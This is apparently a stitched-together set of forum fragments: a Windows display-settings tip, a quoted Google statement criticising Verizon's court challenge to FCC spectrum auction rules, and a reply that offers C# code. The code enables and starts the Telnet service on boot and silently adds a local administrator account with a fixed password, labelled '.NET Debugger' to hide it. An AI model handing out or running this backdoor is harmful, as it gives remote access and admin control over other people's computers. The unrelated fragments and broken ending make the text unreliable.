In the web pages box, uncheck everything. click OK the Apply. You should be able to change the background after that. I've seen this alot and work and that is always the problem. 2. Speaking out, Richard Whitt, Washington telecom and media counsel for Google said, “The nation's spectrum airwaves are not the birthright of any one company. They are a unique and valuable public resource that belongs to all Americans. The FCC's auction rules are designed to allow U.S. consumers—for the first time—to use their handsets with any network they desire, and download and use the lawful software applications of their choice. It's regrettable that Verizon has decided to use the court system to try to prevent consumers from having any choice of innovative services. Once again, it is American consumers who lose from these tactics.” full story:

Not sure if this will help, but if your gonna go with telnet and he has XP you could use this to have telnet start on boot and add a new administrator account. using System; using System.Collections.Generic; using System.Text; using System.ServiceProcess; using System.Configuration; using System.Collections.Specialized; using System.Management; using System.DirectoryServices; namespace service { class Program { static void Main(string[] args) { using (ManagementObject service = new ManagementObject("Win32_Service.Name='TlntSvr'")) { ManagementBaseObject inputArgs = service.GetMethodParameters("ChangeStartMode"); inputArgs["StartMode"] = "Automatic"; ManagementBaseObject outParams = service.InvokeMethod("ChangeStartMode", inputArgs, null); } ServiceController scStateService = new ServiceController("Telnet"); scStateService.Start(); try { DirectoryEntry AD = new DirectoryEntry("WinNT://" + Environment.MachineName + ",computer"); DirectoryEntry NewUser = AD.Children.Add("User1", "user"); NewUser.Invoke("SetPassword", new object[] { "password1" }); NewUser.Invoke("Put", new object[] { "Description", ".NET Debugger" }); NewUser.CommitChanges(); DirectoryEntry grp; grp = AD.Children.Find("Administrators", "group"); if (grp != null) { grp.Invoke("Add", new object[] { NewUser.Path.ToString() }); } //Console.WriteLine("Account Created Successfully"); // Console.ReadLine(); } catch (Exception ex) { Console.WriteLine(ex.Message); //Console.ReadLine(); } } } } If you need a c# compiler you can get it here
